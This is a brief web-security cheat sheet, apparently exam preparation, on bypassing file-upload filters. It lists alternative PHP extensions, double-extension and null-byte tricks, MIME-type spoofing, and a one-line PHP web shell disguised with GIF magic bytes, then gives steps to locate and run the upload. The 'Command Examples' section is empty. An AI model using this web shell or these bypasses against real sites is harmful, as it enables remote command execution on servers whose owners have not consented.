File Upload Attacks
Web
Overview
Bypassing file upload restrictions.
Cheatsheet
Extension Bypass
.php5, .phtml, .phar     # Alternative PHP extensions
.php.jpg, .php%00.jpg    # Double extension and null-byte bypass
Content-Type
Content-Type: image/jpeg # Spoof MIME type
Magic Bytes
GIF89a; <?php system($_GET['cmd']); ?> # Add GIF magic bytes to bypass file check
Execution
- Find upload path
- Navigate and execute
Command Examples
Common Pitfalls
- Not finding upload location
- Uploads renamed/not executable
Exam Survival Tips
- Try all bypass methods
- Check .htaccess override